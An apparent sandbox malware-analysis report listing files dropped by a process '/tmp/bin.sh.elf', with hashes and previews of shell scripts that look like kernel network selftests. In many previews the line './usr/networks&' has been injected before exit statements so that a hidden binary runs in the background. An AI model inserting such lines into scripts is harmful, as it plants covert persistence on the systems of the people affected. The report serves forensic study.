                                                                        Size (bytes):140
                                                                        Entropy (8bit):4.630000937813715
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaBQBEvedQVLpvyoYxvMRvbY6K3OmQLk9bJjWXVOORgn:wDdQfUxMa3OngxJjWMn
                                                                        MD5:864C0B993466007E84B2C18EC3BFC6F2
                                                                        SHA1:A714DC923D9DB001F3AD2DA05A9C617875335F85
                                                                        SHA-256:209EDFC7B23AC287C7403F7ABEEE52FE743C44B97C606201F940199C066CE312
                                                                        SHA-512:E023083DCF81C1038870F27210C9A526574BD1249DE23754EF9661D37DB94F6FFF3DC3308C65830B04C899B5B4434A7519024716DE9BB2019A408224055C104B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..trap cleanup EXIT..setup_prepare.setup_wait.routing_nh_obj..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):10729
                                                                        Entropy (8bit):5.234277562227559
                                                                        Encrypted:false
                                                                        SSDEEP:192:lMTUQUTequHlteEKkMBiaGsAj0932IgQ3:lZruj4ifQ9
                                                                        MD5:72E76957C6C8B8401BEDC93F102DFF2C
                                                                        SHA1:CC16B914A03B7FC19080A70052F306A4D4EB4FF5
                                                                        SHA-256:FC9346B8263E4837A567D526C00B521015FCE8228D3EE23C792A8AD3D4C1F596
                                                                        SHA-512:25E94A808270DD0ADFEF745F8482BFD747F88B1944508CE3A7EFBE9E150FD71E9927954C8A08613A9A39880A3B2971DF44E583F242C091C149E1CA4F42913AD5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_debug().{..if [ "$VERBOSE" = "1" ]; then...echo "$*"..fi.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local ns=$1..local dev=$2..local addr...addr=$(ip -netns $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.# setup and teardown..cleanup().{..local ns...for ns in h1 h2 r1 r2; do...ip netns del $ns 2>/dev/null..done.}..create_vrf().{..local ns=$1...ip -netns ${ns} link add ${VRF} type vrf table ${VRF_TABLE}..ip -netns ${ns} link set ${VRF} up..ip -netns ${ns} route add vrf ${VRF} unreac
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):49
                                                                        Entropy (8bit):4.073694027700372
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORjusVOORgn:Hn
                                                                        MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                                        SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                                        SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
                                                                        SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):8809
                                                                        Entropy (8bit):5.131942825600482
                                                                        Encrypted:false
                                                                        SSDEEP:192:8uX+hN6arJxeYLAEiNEixEiwEpE+60jTEij8EiQTEiQ8Ewswv:oDxXu1hHXWm4A
                                                                        MD5:6409214F7DB17219ACC4BC011DF69AA7
                                                                        SHA1:CE2A3FF1CFAF0C4435E07336519C86D796FA36D0
                                                                        SHA-256:22174E276FCBAD979D3E75A334AED2B45ECFB01086FD7AA69961ECF1B498BBDE
                                                                        SHA-512:6D2D037DC5EE3682E84C8A437223264FCD7939ACE3905DB0E59D320AAA8B5AE9502C5B12A18E2B0436411D92604EFE9FB3A3D55CB5AE75F37E6689D210B1CA2E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..run_cmd().{..local ns..local cmd..local out..local rc...ns="$1"..shift..cmd="$*"...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval ip netns exec ${ns} ${cmd} 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# create namespaces and interconnects..create_ns().{..local ns=$1..local addr=$2..local addr6=$3...[ -z "${addr}" ] && addr="-"..[ -z "${addr6}" ] && addr6="-"...ip netns add ${ns}...ip -netns ${ns} link set lo up..if [ "${addr}" != "-" ]; then...ip -netns ${ns} addr add dev lo ${addr}..fi..if [ "${addr6}" != "-" ]; then...ip -netns ${ns} -6 addr add dev lo ${addr6}..fi...ip -netns ${ns} ro add unreachable default metric 8192..ip -netns ${ns} -6 ro add unreachable default metric 8192...ip netns exec ${ns} sysctl -qw net.ipv4.ip_forward=1..ip n
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2423
                                                                        Entropy (8bit):5.348615674361073
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZmbexK9Ike8wCqHKVc+iAtGzI9R5LnduFKFuNrM730iRi5oivcsxmz9Q:VAwCEKxiLKzWcu5uRYcsxg9Q
                                                                        MD5:9D218445D56FAC6B88E0E2E435BA2991
                                                                        SHA1:878089A1BF78B2B966AFFE6405B000ED266C3B71
                                                                        SHA-256:A6E20F1D6177071C5161DBE1979B9586C3ACE1E81A01CAEDA8DC3D1ABBAC74F0
                                                                        SHA-512:78C29745CE9CF5DB1BA2A3348DCBAA3821E78DEFA51A7890A39DFA9B2C1E42FE6DAA9E811FFA2464CC067401528AE55269A3E70B5BC95B7688B0F1DA31ADA903
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..# Argument parsing.if [[ "$#" -lt "2" ]]; then..echo "Usage: $0 [4|6] [tcp|udp|raw|raw_hdrincl|packet|packet_dgram] <args>"..exit 1.fi..readonly IP="$1".shift.readonly TXMODE="$1".shift.readonly EXTRA_ARGS="$@"..# Argument parsing: configure addresses.if [[ "${IP}" == "4" ]]; then..readonly SADDR="${SADDR4}"..readonly DADDR="${DADDR4}".elif [[ "${IP}" == "6" ]]; then..readonly SADDR="${SADDR6}"..readonly DADDR="${DADDR6}".else..echo "Invalid IP version ${IP}"..exit 1.fi..# Argument parsing: select receive mode.#.# This differs from send mode for.# - packet:.use raw recv, because packet receives skb clones.# - raw_hdrinc: use raw recv, because hdrincl is a tx-only option.case "${TXMODE}" in.'packet' | 'packet_dgram' | 'raw_hdrincl')..RXMODE='raw'..;;.*)..RXMODE="${TXMODE}"..;;.esac..# Start of state changes: install cleanup handler.save_sysctl_mem="$(sysctl -n ${path_sysctl_mem})"..cleanup() {..ip netns del "${NS2}"..ip netns del "${NS1}"..sysctl -w -q "${pat
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):553
                                                                        Entropy (8bit):5.3899937534824
                                                                        Encrypted:false
                                                                        SSDEEP:12:9eZNLWP1k99KSjnNflg6vBZNfoEfVaf7mfFtzMK4n:2LWP1EdnNfdlQEfcf7mfXzL4
                                                                        MD5:15A4626E27E3B938F8FFDBD303D53B33
                                                                        SHA1:84F28641C199CB497995A3CE8DB5A2FCD25DC5A0
                                                                        SHA-256:0AF6B2C83FF0359431DFB094DE232EAE76F5B75451F6F676929D9AB475A21387
                                                                        SHA-512:950324F54EAC2C5342721A73404919F1D386BEDB5930DF72C0CBE72C6F6AA43EA0152542B5881F6735321E4D90D86937276FBD7F3269FC1BE181B527066FE6C2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..ip link show 2>/dev/null >/dev/null.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without the ip tool"..exit $ksft_skip.fi..TMP_LIST_NETDEV="$(mktemp)".if [ ! -e "$TMP_LIST_NETDEV" ];then..echo "FAIL: Cannot create a tmp file"..exit 1.fi..ip link show |grep '^[0-9]' | grep -oE '[[:space:]].*eth[0-9]*:|[[:space:]].*enp[0-9]s[0-9]:' | cut -d\ -f2 | cut -d: -f1> "$TMP_LIST_NETDEV".while read netdev.do..kci_test_netdev "$netdev".done < "$TMP_LIST_NETDEV"..rm "$TMP_LIST_NETDEV".exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6927
                                                                        Entropy (8bit):5.245316277904996
                                                                        Encrypted:false
                                                                        SSDEEP:192:GZgLaLRutZZZY0RotZeOLeiTJPxJdErVNSPB1:0LMvy5xLB1
                                                                        MD5:71A773A1CF4C2844EC690C14DC2795D4
                                                                        SHA1:4D7F2F8656BCEE4FEC77F9CB4E48696074142753
                                                                        SHA-256:C4D2798D0A46D005EC75BB7894E220768B253C31B354A917F24B3F82D3AFF42F
                                                                        SHA-512:B8E3BA8C33648BE22E6E241E083DF708A894C57CAD36C0FB5EC5A60549928EDAE105FFEAE2011EDD83C2FC206D0A55A3EA714B7997D76160C586A8E9D32AD933
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..elif [ $ret -eq $ksft_skip ]; then...printf "TEST: %-60s [SKIP]\n" "${tdesc}"...err_flush..fi...return $ret..)..ret=$?..case $ret in...0)....all_skipped=false....[ $exitcode=$ksft_skip ] && exitcode=0...;;...$ksft_skip)....[ $all_skipped = true ] && exitcode=$ksft_skip...;;...*)....all_skipped=false....exitcode=1...;;..esac...return $ret.}..run_test_nh() {..tname="$1"..tdesc="$2"...USE_NH=yes..run_test "${tname}" "${tdesc} - nexthop objects"..USE_NH=no.}..test_list_flush_ipv4_exception() {..setup namespaces routing || return $ksft_skip..trace "${ns_a}" veth_A-R1 "${ns_r1}" veth_R1-A \.. "${ns_r1}" veth_R1-B "${ns_b}" veth_B-R1 \.. "${ns_a}" veth_A-R2 "${ns_r2}" veth_R2-A \.. "${ns_r2}" veth_R2-B "${ns_b}" veth_B-R2...dst_prefix1="${prefix4}.${b_r1}."..dst2="${prefix4}.${b_r2}.1"...# Set up initial MTU values..mtu "${ns_a}" veth_A-R1 2000..mtu "${ns_r1}" veth_R1-A 2000..mtu "${ns_r1}" veth_R1-B 1500..mtu "${ns_b}" veth_B-R1 150
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):27705
                                                                        Entropy (8bit):5.130824667635872
                                                                        Encrypted:false
                                                                        SSDEEP:384:plueipsq4jk3JBM9M805s0/tuInWXwgs67rZB4c4LcjyVIBM0l8Xt7OQ:plj0CwtupXwgs5
                                                                        MD5:4C5823B32859398C4CF3545B601B90AD
                                                                        SHA1:1CECDD2FED9EC85D8E633DDA4266F9BB231D527C
                                                                        SHA-256:7F519C632595142674CD45BC369973D1140A098D9622A2BEA3202E086DA51F10
                                                                        SHA-512:15015A5332A8757DB8A0BBB776F18CB9F87C70FBFDCEF2FD0ADBF4E5443CB46A90FC6C43D2AC397B22A161862FBFE633E654A9B1F4C0EF588532509EC5F5E718
                                                                        Malicious:false
